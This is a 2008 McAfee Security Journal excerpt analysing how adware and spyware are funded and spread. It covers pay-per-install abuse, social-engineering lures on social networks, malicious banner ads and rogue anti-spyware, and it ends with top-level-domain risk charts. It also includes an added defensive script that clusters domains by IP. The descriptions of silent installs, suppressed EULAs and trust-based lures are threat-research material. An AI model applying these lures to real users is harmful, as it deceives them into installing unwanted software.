Figure 1: Adware growth reached its peak in 2005. (Source: McAfee Avert Labs). [Bar chart: adware count per year, 2000–2008 (2008 is a forecast); y-axis 0–5000.]

Compensation Models and Caveats

Adware and spyware use two major compensation models for online advertisements. Both models work well in a perfect world, but how do they fare in a world that includes people with malicious intent? Let’s take a look at how these models can be exploited.3

Pay-per-install: The client-side model.

In the pay-per-install (PPI) model, companies selling products or services pay the adware provider to display ads. The adware provider in turn pays individuals or affiliates to distribute its adware using bundling or other means. (ZangoCash, for example, pays from $0.75 to $1.45 in the United States for each piece of adware installed.4) The software finally has to be installed on the client machine. The PPI model normally tracks installations of software by using a particular referrer. So, if John Doe hosts a PPI-based adware installer on his web site and some other user downloads and installs that software via the site, John will receive a certain amount of money. To increase the downloads from his site, John might try to increase traffic using attention-getting content such as catchy titles, adult images or videos, free games, or ringtones.

Figure 2: Spyware and monitoring programs have also seen a general decline since 2005, but we anticipate an upturn in the latter in 2008. (Source: McAfee Avert Labs). [Bar chart: spyware and monitoring programs per year, 2000–2008 (2008 is a forecast); y-axis 0–300.]

As traffic and payments increase, John could decide to use an exploit to install the adware application without the users’ being aware of the installation. Many such applications display a EULA before installing, but this would only alarm visitors, so John might further decide to tweak the application to suppress the EULA and increase his installation score. Now if John is a seasoned hacker, he could replicate this model on thousands of compromised sites to exponentially increase his installations and payoff. Fellow McAfee Security Journal author Benjamin Edelman describes a similar, real scenario on his web site.5

The PPI model of compensation proved very lucrative for programmers as well as for people with malicious intent—thus contributing to the fantastic growth of adware and spyware. Many installation vectors support this model. These vectors can be broadly divided into two categories:

• Social engineering This requires user interaction and relies on the user to install and, in some cases, even propagate the software. The number of social engineering methods is limited only by the imaginations of attackers, who can often lure even the most vigilant users. In the example of John Doe, offering free games or ringtones is bait that many people cannot resist. Ultimately, the user decides to take the risk or leave the free goodies on the table.

• Exploits Installation of adware through exploits may not require any human interaction at all; however, in many cases the user is lured by social engineering techniques to malicious web sites that host these exploits.

Pay-per-click: The server-side model.6

The pay-per-click (PPC) model has two variations: sponsored ads and content-based ads.

The PPC model does not require any adware or spyware software to be installed on the user’s system, but the model may depend on the user’s input for context—for example, from search engine results—to provide relevant ads. Google content-based ads, for example, work by using the PPC model.

Some of the most common delivery mechanisms for PPC content are:

• Banner ads Ads are shown within a banner or predefined space. This content can change.

• Pop-up or pop-under ads Ads are delivered in separate windows, creating an annoying user experience.

• Flash-based ads These are similar to banner ads but use flash animation to vary the ad content.

The PPC model can work in a much more controlled environment, in which the web site hosting these ads may choose the delivery mechanism. Although the PPC model is server based and would seem more secure, it’s not entirely foolproof. Scammers can still use deceptive practices to trick users.7

Because most of the ad content is stored on servers and uses JavaScript, Flash, and other rich-content technologies, inserting malicious ads in the ad stream is not difficult.8, 9 In one such case, a Yahoo-owned ad network unknowingly distributed malicious banner ads that eventually downloaded Trojans on users’ machines. In this particular scenario, banner ads were shown on web sites such as MySpace and PhotoBucket. These malicious ads were slipped into Yahoo’s ad network undetected. We’ve also seen user clicks hijacked by DNS cache poisoning.10 However, users are not directly affected in these cases; the ISP or server hosting the ads is more vulnerable to these threats.

To better mitigate the attack vectors exploiting these compensation models, let’s take a brief overview of how social engineering plays a role in this online market of endless revenue-generation possibilities.

Social Engineering Aspects

Hackers are going to go after the weakest link in the security chain, which is always the people. — Kevin Mitnick (2007)11

Regardless of the model adware developers use, their primary success factor is users. In our example of John Doe, people were infected because they visited the malicious web site driven by Doe’s social engineering tactics. One reason social engineering is frequently successful is because many people trust what they see and are, by nature, not suspicious of certain online activities. Malicious social engineers know how to exploit human nature. A case study conducted by the U.S. Department of the Interior points out that 84 percent of government departments attribute various security breaches to human error; 80 percent of the departments attribute these errors to a lack of security training, security knowledge, or failure to follow procedures.12

Hundreds of thousands of malware samples use social engineering to get installed on users’ machines: this is one of the most common vectors of malware delivery. Matthew Braveman categorizes various installation vectors in four major categories.13 According to his study, almost one-third of the malware was installed by leveraging social engineering methods.

Adware and spyware have adopted many popular social engineering methodologies and have come up with new techniques to distribute their software. Social engineering is the favored installation vector of the PPI model, which offers broader options for delivering adware and spyware. These applications can be delivered using apparently innocuous mechanisms, such as bundled freeware, or by suspicious mechanisms, such as spam or email attachments with deceptive text. A user who wants freeware, for example, can knowingly install adware to use the free services. Even if an installation occurs via an exploit or spam, security companies may still not determine that the software is malicious because of vendor claims that they have no role in this distribution and that other people are exploiting their software.

Figure 3: Several vectors expose users to unwanted and malicious programs. [Diagram, recovered labels only: a user reaches a social engineering web site (e.g., one offering free MP3 links, adult video, etc.) by four paths: a link received via a friend’s profile in a social networking site, Google notebook, trusted domain, etc. (high trust level); a social networking web site (high trust level); a search engine (low trust level); or a link received via IM, email, or spam (lowest trust level).]

It’s about trust

Figure 3 depicts four scenarios for user exposure to a social engineering site. Although the illustration is simple, it can help us understand the following real-world cases. The key is that the higher the trust level, the more likely a particular social engineering technique will succeed. We’ll explain further using three brief case studies.

Case 1: Social networking web sites

Social networking sites are a boon to social engineers because most people on these sites are looking to make or stay in touch with friends. Social engineers may create relationships to increase the trust factor, as shown at the top of Figure 3. The trust level is usually very high for this category.

A number of notable social engineering attacks have exploited this trust to install adware on users’ machines:

• MySpace Adult Content viewer (trust level: medium). This incident relied on a user clicking a pop-up ad featuring young people with a title such as “I want to be loved.”14 Clicking on these ads downloaded the MySpace Adult Content software that reportedly downloaded adware.

• MySpace Fraudulent YouTube Video (trust level: high). WebSense reported in late 2006 a fraudulent YouTube video that was posted on multiple fake profiles at MySpace.15 Attempting to view the video required installing Zango Cash.

• Facebook Secret Crush Application (trust level: very high). In January 2008, an advisory was generated about a malicious widget called Secret Crush that was trying to install adware.16 This social engineering tactic worked by first sending a Facebook request with the title “1 secret crush invitation.” Upon opening this request, the user had to install a widget to find out who sent the secret crush. The request further prompted the user to forward it to five friends before it would display who sent the crush. Naïve users forwarded this message to friends, making this a social worm. After taking these steps all that users saw was a message to download Adware Zango. Victims were easily lured by this scenario because the trust level was very high.

Case 2: Banner ads

Banner ads lie in the domain of the PPC model. The trust level in these real-world scenarios was very high, as users were visiting the trusted site that they visited frequently.

• In 2006, The Washington Post reported a malicious banner ad in MySpace that served adware as well as Trojans to millions of users using Microsoft Windows Metafile exploits; this did not require any user intervention.17

• In 2008, we’ve seen an increase in malicious banner ads. The latest at the time we wrote this article was a Flash-based ad at usatoday.com.18 Just by visiting the page, users were socked with multiple malware as well as fake alerts (a popular social engineering tactic) to download a rogue antispyware application called Malware Alert. (Rogue programs can include PUPs as well as Trojans.)

Case 3: Other intriguing tactics

• Spoofed email (trust level: low). In one case, spoofed emails from eBay were spammed with links pointing to download adware.19 The social engineering aspect occurred in the content of the email, which “warned” unsuspecting users that there was a problem in their billing information and that they needed to update the data by downloading particular software.

• Fake error pages (trust level: medium). Certain web sites displayed fake “page not found” error messages and offered to resolve the situation by downloading an ActiveX component that installed WinFixer.20

• Google notebook spam (trust level: high). In a recent development, scammers used yet another social engineering technique by spamming links to Google notebook pages.21 The hyperlink is in the format www.google.com/notebook/public/[UserID]/[blocked]. The domain google.com makes people less suspicious and encourages them to click on the malicious web pages, which host multiple links to adult sites or fake videos. These eventually download various rogue anti-spyware apps.

A Silent Retreat

The initial lack of laws regulating adware and spyware applications gave lots of freedom to their developers, whether their motivations were merely financial or actually malicious. At first, users seemed protected because they had EULAs to warn them of any unwanted effects from these applications. But the EULAs were often confusing, incomplete, or unseen. Once found, they’re hard to read—often enclosed in tiny windows that display only a few words at a time. With such an effective smokescreen, why have adware and spyware declined? Several factors have contributed.

• Lawsuits Due to an increase in abuses by adware and spyware apps, consumers and other plaintiffs have filed multiple lawsuits against some big distributors.22 23 24 25 26 27 Various court rulings have helped to limit the numbers of adware and spyware. In the settlement against Zango,12 for example, the court “requires that Zango monitor its third-party distributors to assure that its affiliates and their sub-affiliates comply with the FTC order.” The ruling also “bars Zango, directly or through others, from exploiting security vulnerabilities to download software, and requires that it give clear and prominent disclosures and obtains consumers’ express consent before downloading software onto consumers’ computers.” Such orders have helped to weaken the PPI method and have driven ad distributors to clean up their acts.

• Public awareness and industry groups The Federal Trade Commission has an informative web site28 that provides tips on how to protect against spyware and how to report abuses. The Anti-Spyware Coalition also offers a lot of information and details about this threat.29 Due to the efforts of these organizations, both consumers and lawmakers have a much better understanding of the issues and rules related to online advertising. This increased awareness has helped to lower the occurrence of these unwanted applications.

• Bad publicity and potential lawsuits against advertisers having association with adware companies The money that drove the adware and spyware market initially came from advertisers that used adware companies to show the ads. These product and service companies did not at first fully investigate how the adware firms distributed their ads. In a historic settlement published on January 29, 2007,30 the agreement stated that “prior to contracting with a company to deliver their ads, and quarterly thereafter, the companies must investigate how their online ads are delivered. The companies must immediately cease using adware programs that violate the settlement agreements or their own adware policies.” Because advertisers now understand the risks (invasion of privacy, improper consent, and others) associated with the PPI model, they are moving toward the PPC model, which requires no applications on users’ systems.

Rogue Applications

Because malware authors gain easy money using scare tactics, there is an increasing trend to distribute rogue applications and fake “alert” Trojans, which display bogus error or infection messages. In most cases, the fake alert Trojans are the downloaders of the rogue applications that detect false registry keys and files as malware. Sometimes, these rogue applications drop the files just to detect them later; in these cases, the rogue application warrants a “Trojan” classification (such Trojans are included in Figure 4).

We have also observed many cases of adware installed by Trojans. The Downloader-UA Trojan category is one such family that uses social engineering tactics to download fake programs. Discovered in late 2004, this family employs loopholes in the way Microsoft Windows Media Player uses digital rights management technology by luring users to download specially crafted media files.31 32 In 2008, the same family of Trojan was involved again in luring users to download a fake MP3 player to play a canned selection of songs; it also downloaded heaps of adware to their systems.33 The growth of rogue applications (PUPs and Trojans) has been exponential in 2008 when compared with previous years. (See Figure 4.)

To gauge the frequency of rogue anti-spyware products distributed via downloader Trojans, we analyzed a set of IP addresses involved in initiating these downloads. A query executed at domain hosts-files.net returned 158 domains associated with the same IP address.34 (See Figure 5.)

Figure 4: Unlike adware and spyware, rogue applications (PUPs and Trojans) have increased dramatically in 2008. (Source: McAfee Avert Labs). [Bar chart: rogue applications per year, 2005–2008 (2008 is a forecast), split into PUP and Trojan; y-axis 0–1000.]

Figure 5: Multiple hostnames map to a single IP address that distributes localized rogue applications. [Screenshot of the hosts-file.net query results; hostnames not reproduced here.]

Each of the domains shown in Figure 5 displays either a custom rogue anti-spyware or rogue “system cleaner” product. The pages appear in various languages, as well. In analyzing 620 pages, we found 24 languages used to create both pages and applications, which shows the threats have spread far beyond English-speaking countries. More than once, a single IP is associated with multiple domains; in some cases we saw up to 200 different domains. One query for the keyword “FSA” (which hosts-files.net describes as a class of domains hosting rogue applications) returned close to 3,600 domains distributing rogue applications.35

Conclusion

Looking solely at an analysis of statistics suggests that the growth of adware and spyware is on the decline. However, the intriguing social engineering tactics that are used to distribute these PUPs are still with us, delivering rogue applications and Trojans. With the increase of the server-side model (PPC) of ad delivery, we will certainly see improved social engineering tactics luring users to click on these ads and generate revenue for the affiliates. The distribution of adware and Trojans will continue to gain ground at social networking sites. Although the overall number of adware and spyware has declined, we see no easy solution in the near future to the problem of unwanted programs. Because adware companies pay for such installations, their moral duty should be to keep track of each installation and quickly stop any potential misdistribution of their software. But will they really do this? With the changing threat landscape and the increase in revenue-motivated Trojans, we have to remain vigilant and train employees and home users to better understand the threat of social engineering.

Aditya Kapoor is a senior researcher at McAfee Avert Labs. He was introduced to reverse engineering six years ago while researching at the University of Louisiana at Lafayette for his master’s thesis, which focused on a sliding disassembly algorithm to tackle code obfuscation. At McAfee, Kapoor developed skills in rootkit analysis, byte code comparison, and behavior analysis. He enjoys traveling and studying different cultures and architectures.
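An added example, not code from the article or from McAfee: the hosts-file pivot described in the Rogue Applications section, grouping resolver records by IP address to surface addresses that serve many registered domains carrying rogue “cleaner” wording and localized copies. The records, IP addresses (RFC 5737 documentation range), keyword list and function names are constructed for this illustration.

```python
"""Group resolver records by IP address to surface shared rogue-app hosting.

Added example, not code from the article or McAfee: the article pivots from
one IP address to the 158 domains it hosts. Given (hostname, ip) pairs from a
passive-DNS feed or resolver log, this flags IPs serving many registered
domains and notes rogue "cleaner" wording and localized copies among them.
The records, IPs (RFC 5737 documentation range) and keyword list are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Constructed sample records; none of these names or addresses are real IoCs.
RECORDS: List[Tuple[str, str]] = [
    ("antispy-shield.example", "192.0.2.10"),
    ("www.antispy-shield.example", "192.0.2.10"),   # same registered domain
    ("pc-cleaner-pro.example", "192.0.2.10"),
    ("sys-cleaner-de.example", "192.0.2.10"),
    ("winfix-fr.example", "192.0.2.10"),
    ("news-site.example", "192.0.2.20"),
    ("blog.news-site.example", "192.0.2.20"),
    ("secure-scan-ru.example", "192.0.2.30"),
]

# Wording the article associates with rogue anti-spyware / "system cleaner" lures.
ROGUE_WORDS = re.compile(r"anti.?spy|cleaner|scan|fix|shield|alert", re.I)
# A two-letter code just before the TLD, e.g. "-de", "-fr": a localized copy.
LOCALE_SUFFIX = re.compile(r"-([a-z]{2})\.")


def registered_domain(host: str) -> str:
    """Collapse a hostname to its last two labels (sufficient for the sample)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def domains_by_ip(records: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """ip -> set of distinct registered domains that resolve to it."""
    groups: Dict[str, Set[str]] = defaultdict(set)
    for host, ip in records:
        groups[ip].add(registered_domain(host))
    return groups


def locale_hints(domains: Iterable[str]) -> List[str]:
    """Two-letter suffixes found in the names, sorted (e.g. ['de', 'fr'])."""
    codes = set()
    for d in domains:
        m = LOCALE_SUFFIX.search(d)
        if m:
            codes.add(m.group(1))
    return sorted(codes)


def suspicious_ips(records: Iterable[Tuple[str, str]],
                   min_domains: int = 3) -> Dict[str, dict]:
    """IPs hosting at least min_domains registered domains, with counts of
    how many names carry rogue wording and which locale codes appear."""
    out: Dict[str, dict] = {}
    for ip, doms in domains_by_ip(records).items():
        if len(doms) >= min_domains:
            out[ip] = {
                "domains": len(doms),
                "rogue": sum(1 for d in doms if ROGUE_WORDS.search(d)),
                "locales": locale_hints(doms),
            }
    return out


if __name__ == "__main__":
    for ip, info in suspicious_ips(RECORDS).items():
        print(ip, info)
```

The threshold and keyword list are the tunable parts: on real passive-DNS data, shared hosting and CDNs also put many domains on one IP, so the rogue-wording count and the locale spread are what separate a lure farm from an ordinary web host.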

endnotes
1 http://www.antispywarecoalition.org/documents/2007glossary.htm
2 OptOut, Gibson Research Corp. http://www.grc.com/optout.htm
3 http://en.wikipedia.org/wiki/Compensation_methods
4 Source: Zango web site. http://www.cdt.org/headlines/headlines.php?iid=51
5 http://www.benedelman.org/news/062907-1.html
6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29
7 http://www.benedelman.org/ppc-scams/
8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx
9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/
10 http://www.secureworks.com/research/threats/ppc-hijack/
11 http://www.csc.com/cscworld/012007/dep/fh001.shtml
12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternalExternalThreat%20Dudeck.ppt
13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400-2550c479f95d/Social_Engineering_Modeling.pdf
14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/
15 http://securitylabs.websense.com/content/Alerts/1300.aspx
16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html
17 http://blog.washingtonpost.com/securityfix/2006/07/myspace_ad_served_adware_to_mo.html
18 http://securitylabs.websense.com/content/Alerts/3061.aspx
19 http://securitylabs.websense.com/content/Alerts/738.aspx
20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-just-file-not-found/
21 http://www.cantoni.org/2008/06/04/google-notebook-spam
22 http://www.benedelman.org/spyware/nyag-dr/
23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html
24 http://www.internetlibrary.com/cases/lib_case358.cfm
25 http://blogs.zdnet.com/Spyware/?p=655
26 http://www.ftc.gov/opa/2006/11/zango.shtm
27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm
28 http://onguardonline.gov/spyware.html
29 http://www.antispywarecoalition.org/
30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html
31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html
32 http://vil.nai.com/vil/content/v_130856.htm
33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3s-running-rampant/
34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches
35 http://hosts-file.net/?s=Browse&f=FSA

How Risky Are Top-Level Domains?

by David Marcus

McAfee SiteAdvisor data shows how risk varies around the world.

In his excellent paper “Mapping the Mal Web, Revisited,” published in the June 2008 issue of McAfee Security Insights,1 our colleague Shane Keats thoroughly examined the distribution of malicious web sites across the Internet using data from McAfee® SiteAdvisor® technology. In this day and age, people need to know where it is safe to surf and search. But if the Internet really is a big digital neighborhood, reflective of any big city in the world, which streets are safe to cross? Which domains are riskier than others? Which top-level domain (TLD) has shown the most improvement in safety? Which has shown the least? What search words are riskier than others?

Internet users ask themselves these questions more and more. The McAfee Security Journal is dedicated to helping you find those answers by providing data and analysis that helps you make the best decisions possible.

In this edition, we summarize recent threat data regarding top-level domains: both generic TLDs—.com, .info, .biz, and so on—as well as country TLDs—.cn, .ru, .br, and others. We look closely not only at the present risk levels of these domains in the Americas, Europe, and Asia but also at how they have changed over the last year. We ranked each TLD by overall risk and then performed additional analysis of email practices, download safety, and the prevalence of web-based exploits; and we broke out the top twenty top-level domains for each type of risk.

The results were striking. Risk is not spread equally across the Internet, as this data clearly illustrates. The generic and country domains showed varying types and degrees of risk and dangers. Some countries benefited from good email habits yet demonstrated poor download practices. Others suffered from hosting exploits or malicious code. We hope these results will help you as you surf. Remember to look both ways before crossing the Internet highway!

Reading the graphs

In the chart labeled “Europe, Middle East and Africa TLDs ranked by overall risk,” you’ll see in the left-most bar that Romania—domain .ro—registered almost seven percent. This means that, according to SiteAdvisor software, McAfee has found that almost seven percent of all sites within that top-level domain have suffered from one or more of the threats we’ve measured: browser exploits, adware/spyware/Trojans/viruses, high-volume commercial email, affiliations with other risky sites, aggressive pop-up marketing, or SiteAdvisor community reviews or comments. The higher the figure, the greater the risk to users.

In addition to an overall figure, we’ve charted the change in risk from the previous year. The line graph shows that in Romania the risk has increased by about one percent, whereas in Slovakia, for example, the risk has decreased by about three percent. Positive numbers indicate increased risk compared with the previous year; negative percentages indicate decreased risk.

David Marcus is Director of Security Research and Communications for McAfee Avert Labs. He brings Avert Labs’ extensive security research to McAfee’s customers and the greater security community. Marcus’ current responsibilities include PR, media and thought leadership, serving as blogmaster for McAfee Avert Labs Security Blog, as well as being co-host of AudioParasitics—The Official PodCast of McAfee Avert Labs. He also manages all publications from Avert Labs, including McAfee Security Journal.

ENDNOTE
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html

Europe, Middle East, and Africa TLDs ranked by overall risk

[Chart: bars show Overall Risk 2008 and a line shows Change in Risk 2007–2008 by points, per TLD; y-axis -4.0% to 8.0%. TLDs shown (ranking order not recoverable from the extraction): Turkey .tr, Norway .no, Iran .ir, Italy .it, Slovakia .sk, Israel .il, Spain .es, Latvia .lv, France .fr, S. Africa .za, Russia .ru, Finland .fi, Poland .pl, Ireland .ie, Iceland .is, Greece .gr, Austria .at, Portugal .pt, Croatia .hr, Estonia .ee, Slovenia .si, Sweden .se, Ukraine .ua, Belgium .be, Lithuania .lt, Bulgaria .bg, Romania .ro, Hungary .hu, Denmark .dk, Germany .de, Yugoslavia .yu, Switzerland .ch, Netherlands .nl, European Union .eu, Czech Republic .cz, United Kingdom .uk.]

Asia TLDs ranked by overall risk

[Chart: bars show Overall Risk 2008 and a line shows Change in Risk 2007–2008 by points, per TLD; y-axis -10.0% to 20.0%. TLDs shown (ranking order not recoverable): Japan .jp, Tuvalu .tv, Taiwan (R.O.C.) .tw, Tokelau .tk, Hong Kong .hk, South Korea .kr, India .in, Tonga .to, Niue .nu, Vietnam .vn, Vanuatu .vu, Thailand .th, Samoa .ws, P.R. of China .cn, Australia .au, Cocos (Keeling) Is. .cc, Indonesia .id, Malaysia .my, Singapore .sg, Philippines .ph, Christmas Is. .cx, New Zealand .nz.]

Americas TLDs ranked by overall risk

[Chart: bars show Overall Risk 2008 and a line shows Change in Risk 2007–2008 by points, per TLD; y-axis -1.5% to 2.5%. TLDs shown (ranking order not recoverable): Chile .cl, Brazil .br, Canada .ca, Mexico .mx, Colombia .co, Argentina .ar, Venezuela .ve, United States .us.]

Risk criteria used to measure TLDs
• Browser exploits
• Adware/spyware/Trojan/viruses
• High volume commercial email
• Affiliations with other risky sites
• Aggressive pop-up marketing
• SiteAdvisor community reviews/comments

Top 20 TLDs ranked by download risk

[Chart: bars show Overall Risk 2008 and a line shows Change in Risk 2007–2008 by points, per TLD; y-axis -5.0% to 25.0%. TLDs shown (ranking order not recoverable): Tuvalu .tv, Italy .it, Tokelau .tk, Israel .il, Tonga .to, Latvia .lv, Vietnam .vn, Samoa .ws, Belgium .be, Bulgaria .bg, Romania .ro, P.R. of China .cn, Business .biz, Cocos (Keeling) Is. .cc, Network .net, Christmas Is. .cx, Information .info, United States .us, Commercial .com, Families/Individuals .name.]

Top TLDs ranked by email practices

[Chart: bars show Overall Risk 2008 and a line shows Change in Risk 2007–2008 by points, per TLD; y-axis -20.0% to 70.0%. TLDs shown (ranking order not recoverable): Taiwan (R.O.C.) .tw, Hong Kong .hk, Slovakia .sk, South Korea .kr, India .in, Latvia .lv, Russia .ru, Croatia .hr, Thailand .th, Samoa .ws, Ukraine .ua, Bulgaria .bg, P.R. of China .cn, Business .biz, Cocos (Keeling) Is. .cc, Network .net, Yugoslavia .yu, Information .info, Commercial .com, European Union .eu.]

Top 20 TLDs ranked by exploits

[Chart: bars show Overall Risk 2008 and a line shows Change in Risk 2007–2008 by points, per TLD; y-axis -0.4% to 1.2%. TLDs shown (ranking order not recoverable): Hong Kong .hk, India .in, Tonga .to, Niue .nu, Poland .pl, Russia .ru, Portugal .pt, Croatia .hr, Vietnam .vn, Samoa .ws, Ukraine .ua, Romania .ro, P.R. of China .cn, Business .biz, Cocos (Keeling) Is. .cc, Network .net, Information .info, United States .us, Commercial .com, Families/Individuals .name.]

McAfee, Inc.
3965 Freedom Circle
Santa Clara, CA 95054 USA
888 847 8766
www.mcafee.com

McAfee and/or additional marks herein are registered trademarks or trademarks of McAfee, Inc. and/or its affiliates in the United States and/or other countries. McAfee red in connection with security is distinctive of McAfee brand products. All other registered and unregistered trademarks herein are the sole property of their respective owners. © 2008 McAfee, Inc. All rights reserved.